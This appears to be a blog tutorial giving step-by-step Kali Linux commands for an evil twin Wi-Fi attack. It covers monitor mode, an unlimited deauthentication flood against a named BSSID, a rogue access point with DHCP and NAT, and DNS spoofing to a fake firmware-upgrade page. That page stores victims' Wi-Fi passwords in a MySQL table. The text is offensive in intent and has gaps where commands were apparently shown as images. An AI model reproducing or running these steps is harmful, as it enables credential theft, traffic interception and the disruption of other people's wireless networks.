An evil twin, in the subject of network security, is a fake or rouge (WAP) wireless access point that appears as a genuine hotspot offered by a legitimate provider.

In an evil twin attack, an eavesdropper or hacker fraudulently creates this rogue hotspot to collect the personal data of unsuspecting users. Sensitive data can be stolen by spying on a connection or using a phishing technique.

For example, a hacker using an evil twin exploit may be positioned near an authentic Wi-Fi access point and discover the service set identifier (SSID) and frequency. The hacker may then send a radio signal using the exact same frequency and SSID. To end users, the rogue evil twin appears as their legitimate hotspot with the same name.

Installing required tools:

  • Open terminal and type:

                               #apt-get install dnsmasq -y

to install latest version of dhcp server in Kali Linux.

Configure tools:

Create a configuration file for dnsmasq using nano editor.

  • Configuration file dnsmasq:

Save dnsmasq.conf file and exit.

  • Puting wireless adapter into monitor mode

#airmon-ng start wlan0

Now our card is in monitor mode without any issues with network manager. We can simply start monitoring the air with command

#airodump-ng wlan0mon

Copy our target’s details for further reference

Display all wireless adapter connected with kali linux

Set tx-power of wireless adapter wlan0mon to max=1000mW(30dBm)

tx-power stands for transmission power. By default it is set to 20dBm(Decibel metre) or 100mW.

tx-power in mW increases 10 times with every 10 dBm. See the dBm to mW table.

If your country is set to US while installation. then your card should operate on 30 dBm (1000 mW)

Start Evil Twin Attack

Begin the Evil Twin attack using airbase-ng:

By default, airbase-ng creates a tap interface(at0) as the wired interface for bridging/routing the network traffic via the rogue access point. you can see it using ifconfig at0 command.

For the at0 to allocate IP address we need to assign an IP range to itself first.

Allocate ip and subnet mask

For the at0 to allocate IP address we need to assign an IP range to itself first.

The Class A IP address,, matches the dhcp-option parameter of dnsmasq.conf file. Which means at0 will act as the default gateway under dnsmasq

Now we will use our default Internet-facing interface, eth0, to route all the traffic from the client through it.

In other words, allowing the victim to access the internet and allowing ourselves(attacker) to sniff that traffic.

For that, we will use iptables utility to set a firewall rule to route all the traffic through at0 exclusively.

You will get similar output if using VM

Enable NAT by setting Firewall rules in iptables

Make sure you enter correct interface for –out-interface. eth0 here is the upstream interface where we want to send out packets, coming from at0 interface (rogue AP). Rest is fine.

After entering the above command if you are willing to provide Internet access to the victim just enable routing using the command below.

Enable IP Forwarding

Entering “1” in the ip_forward file will tell the system to enable the rules defined in the IPtables and start forwarding traffic(if any). 0 stand for disabling. Although rules will remain defined until the next reboot.

Start DHCP Listner

#dnsmasq -C ~/Desktop/dnsmasq.conf -d

Start Services

Download Rogue AP configuration files

Getting files from cdn.rootsh3ll.com for fake AP to display fake administrator page for enter password by victim.

Unziping of Rogue_AP.zip

This command will extract the contents of rogue_AP.zip file and copy them to the apache’s HTML directory so that when the victim opens the browser s/he will automatically be redirected to the default index.html webpage.

Database Configuration

Log in root user
#mysql -u root -p

Create  new user fakeap and password fakeap.

As you cannot execute MySQL queries from PHP being a root user since version 5.7

mysql>create user fakeap@localhost identified by ‘fakeap’;

now create database and table as defined in the dbconnect.php

                               mysql>create database rogue_AP;

                               mysql>use rogue_AP;

mysql>create table wpa_keys(password1 varchar(32), password2 varchar(32));

Grant fakeap all the permissions on rogue_AP Database

mysql> grant all privileges on rogue_AP.* to 'fakeap'@'localhost';


Log in using new user

                  mysql> mysql -u fakeap -p

 Select rouge_AP database

                  mysql> use rogue_AP;

Insert a test value in the table

   mysql> insert into wpa_keys(password1, password2) values (“testpass”, “testpass”);

   mysql> select * from wpa_keys;

Note that both the values are same here, that means password and confirmation password should be the same.

Evil Twin attack is now ready; however, we need to wait for the client to connect and see the credential coming.

In some cases, your client might already be connected to the original AP. You need to disconnect the client forcefully using aireplay-ng utility.

This is called a deauthentication attack. Attacker sends carefully crafted packets with the BSSID of the Access Point in the air telling every client to de-authenticate. Connected clients honor the command and disconnect themselves.

#aireplay-ng --deauth 0 -a FC:DD:55:08:4F:C2 wlan0mon

–deauth 0 = unlimited deauthentication request

-a = BSSID

As soon as a client connects to our Fake AP we will see activity in the airbase-ng terminal window like this

As soon as a client connects to our Fake AP we will see activity in the DHCP Listener terminal window like this

DNS Spoofing

It Spoof the all web URLs surfing by victim. Victim can now access the Internet. You can Sniff the client traffic at this stage:

When victim tries to access any website(google.com in this case), s/he will see this page which tell the victim to enter the password to download and upgrade the firmware.

Then Victim type password

After Submit password. The Credential save in our(attackers) database.

And victim shows upgrading page.

After that victim can access internet by this victim cannot doubt on this attack.

Just go to the previously used command in the mySQL terminal window and see whether a new update is there or not.

After simulating I checked the mySQL DB and here is the output

and that’s how we are successfully executes an Evil Twin Attack.


Leave a Reply

Your email address will not be published. Required fields are marked *

Scroll to top